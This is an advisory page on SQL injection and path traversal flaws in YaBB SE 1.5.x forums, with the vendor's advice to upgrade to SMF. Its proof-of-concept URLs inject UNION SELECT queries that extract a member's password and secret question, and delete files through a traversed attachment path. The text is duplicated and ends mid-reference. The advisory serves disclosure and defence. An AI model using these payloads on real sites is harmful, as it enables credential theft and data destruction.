YABB SE Multiple Input Validation Vulnerabilities
BID:9774
Info
YABB SE Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 9774 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0343 CVE-2004-0344 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 01 2004 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | Discovery is credited to Alnitak and BackSpace. |
| Vulnerable: |
YaBB SE YaBB SE 1.5.5 b YaBB SE YaBB SE 1.5.5 YaBB SE YaBB SE 1.5.4 |
| Not Vulnerable: | |
Discussion
Exploit / POC
YABB SE Multiple Input Validation Vulnerabilities
No exploit is required.
The following proof of concept examples have been provided:
http://www.example.com/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,%27-%2
7,secretQuestion),null,null,null,null,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
http://www.example.com/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;posti
d=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
http://www.example.com/forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../d
eleteme.txt;subject=hola;message=hola;postid=-1+UNION+SELECT+null,3,null,nul
l,null,null,null,null,null,null,null,null/* HTTP/1.0
No exploit is required.
The following proof of concept examples have been provided:
http://www.example.com/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,%27-%2
7,secretQuestion),null,null,null,null,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
http://www.example.com/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;posti
d=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
http://www.example.com/forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../d
eleteme.txt;subject=hola;message=hola;postid=-1+UNION+SELECT+null,3,null,nul
l,null,null,null,null,null,null,null,null/* HTTP/1.0
Solution / Fix
YABB SE Multiple Input Validation Vulnerabilities
Solution:
The vendor has reported that users, who are affected by these vulnerabilities, should upgrade to SMF 1.0 Public Beta 4. Additionally, the vendor has announced that fixes for YaBB SE will not be released, as this product is no longer supported. SMF 1.0 Public Beta 4 packages can be downloaded at the following location:
http://www.simplemachines.org/download.php
Solution:
The vendor has reported that users, who are affected by these vulnerabilities, should upgrade to SMF 1.0 Public Beta 4. Additionally, the vendor has announced that fixes for YaBB SE will not be released, as this product is no longer supported. SMF 1.0 Public Beta 4 packages can be downloaded at the following location:
http://www.simplemachines.org/download.php
References
YABB SE Multiple Input Validation Vulnerabilities
References:
References:
- YaBB SE Project Page (YaBB SE)
- Re: YabbSE (3 on 1) (David